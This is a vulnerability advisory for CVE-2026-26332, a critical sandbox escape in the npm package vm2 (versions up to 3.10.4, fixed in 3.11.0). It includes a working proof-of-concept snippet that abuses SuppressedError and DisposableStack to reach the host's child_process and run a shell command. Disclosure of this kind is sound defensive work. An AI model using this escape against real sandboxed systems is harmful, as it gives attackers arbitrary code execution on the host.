GHSA-55hx-c926-fr95

Source

https://github.com/advisories/GHSA-55hx-c926-fr95

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-55hx-c926-fr95/GHSA-55hx-c926-fr95.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-55hx-c926-fr95

Aliases

CVE-2026-26332

Published

2026-05-05T16:33:45Z

Modified

2026-05-05T16:46:15.054245Z

Severity

9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator

Summary

VM2 Has a Sandbox Escape Issue via SuppressedError

Details

In vm2 v3.10.4 on Node.js v24.13.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code.

PoC

const { VM } = require("vm2");

const vm = new VM();

vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  ds.dispose();
} catch(e) {
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" });
}
`);

Database specific

{
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T16:33:45Z",
    "cwe_ids": [
        "CWE-693",
        "CWE-94"
    ],
    "severity": "CRITICAL",
    "nvd_published_at": "2026-05-04T17:16:22Z"
}

References

Affected packages

npm / vm2

Package

Name: vm2; View open source insights on deps.dev
Purl: pkg:npm/vm2

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.11.0

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-55hx-c926-fr95/GHSA-55hx-c926-fr95.json"

last_known_affected_version_range

"<= 3.10.4"